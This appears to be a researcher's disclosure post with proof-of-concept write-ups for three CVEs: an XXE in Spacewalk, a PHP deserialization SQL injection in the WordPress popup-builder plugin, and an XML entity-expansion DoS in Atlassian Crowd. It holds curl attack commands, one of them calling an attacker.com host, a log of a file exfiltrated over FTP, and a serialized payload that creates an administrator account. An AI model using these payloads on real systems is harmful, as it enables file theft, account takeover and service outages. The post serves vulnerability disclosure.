Proof of Concept exploit for CVE-2020-1693 – Spacewalk <= 2.9 XXE

CVE Description
A flaw was found in Spacewalk up to version 2.9 where it was vulnerable to XML internal entity attacks via the /rpc/api endpoint. An unauthenticated remote attacker could use this flaw to retrieve the content of certain files and trigger a denial of service, or in certain circumstances, execute arbitrary code on the Spacewalk server.

Local file read

External DTD:

XML-RPC call for final exploit

curl -X POST -sik https://victim.tld/rpc/api -H ‘Content-Type: application/xml’ –data @xxe-ftp-exfil.xml

After execution and running an FTP listener, you will see the remote DTD fetch, along with the following exfiltration of the local file.

"GET /external.dtd HTTP/1.1" 200 448 "-" "Java/1.8.0_151"

2020/02/17 00:00:00 [*] Connection Accepted from [x.x.x.x:00000]
USER: anonymous
PASS: Java1.8.0_151@
/root:x:0:0:root:
/root:
/bin
2020/02/17 00:00:00 [*] Closing FTP Connection

CVE-2020-9006 – popup-builder WP Plugin SQL injection via PHP Deserialization

The Popup Builder plugin 2.2.8 through 2.6.7.6 for WordPress is vulnerable to SQL injection via PHP Deserialization on attacker-controlled data with the attachmentUrl POST variable. This allows creation of an arbitrary WordPress Administrator account, leading to possible Remote Code Execution because Administrators can run PHP code on WordPress instances.

Vulnerable code snippet:

The POST variable attachmentUrl is downloaded, and passed directly into unserialize(), and then the deserialized data is used to insert data into the DB.  By reversing the function we can create the following code to create the serialized data needed to create a wordpress admin.

Which produces the following serialized data (before being base64 encoded):

a:2:{s:10:”customData”;a:1:{s:5:”users”;a:1:{i:0;a:7:{i:0;s:8:”zeroauth”;i:1;s:34:”$P$B2R7.3rylqoX.YrEfQmcNEYVDheK1a/”;i:2;s:8:”zeroauth”;i:3;s:18:”[email protected]”;i:4;s:20:”https://zeroauth.ltd”;i:5;s:1:”0″;i:6;s:9:”Zero Auth”;}}}s:22:”customTablesColumsName”;a:1:{s:5:”users”;a:7:{i:0;a:1:{s:5:”Field”;s:10:”user_login”;}i:1;a:1:{s:5:”Field”;s:9:”user_pass”;}i:2;a:1:{s:5:”Field”;s:13:”user_nicename”;}i:4;a:1:{s:5:”Field”;s:10:”user_email”;}i:5;a:1:{s:5:”Field”;s:8:”user_url”;}i:6;a:1:{s:5:”Field”;s:11:”user_status”;}i:7;a:1:{s:5:”Field”;s:12:”display_name”;}}}}

This issue has been fixed in the 3.x branch of popup-builder. Versions 2.2.8 through 2.5.3 do not need a nonce, however 2.5.4 through 2.6.7.6 would need a valid nonce.

CVE-2019-20104 – Atlassian Crowd OpenID client vulnerable to Remote DoS via XML Entity Expansion

Atlassian Crowd is a single sign-on and user identity solution software for the web. Crowd comes with a built in OpenID client for testing OpenID integrations, by supplying the test client with a URL hosted with a malicious payload, an attacker can remotely DoS the Crowd instance by XML Entity Expansion that consumes all memory and subsequently crashes the application.

After studying the OpenID protocol and understanding what kind of XML is expected, I was able to craft the following response.

Proof of Concept XML XRDS payload:

Once hosted somewhere, invoking the following will execute the payload on the crowd instance:

curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'

Now, the server will expand entities until memory is consumed and produce output such as:

Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space
java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded

Atlassian has responded to the issue via Bug Bounty program on Bugcrowd.com/atlassian and has issued fixes.

Software has been fixed as of:

  • 3.2.11
  • 3.3.8
  • 3.4.7
  • 3.5.2
  • 3.6.2
  • 3.7.1
  • 4.0.0

CVE and CWD references:

https://jira.atlassian.com/browse/CWD-5526

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104

Happy Hunting 😊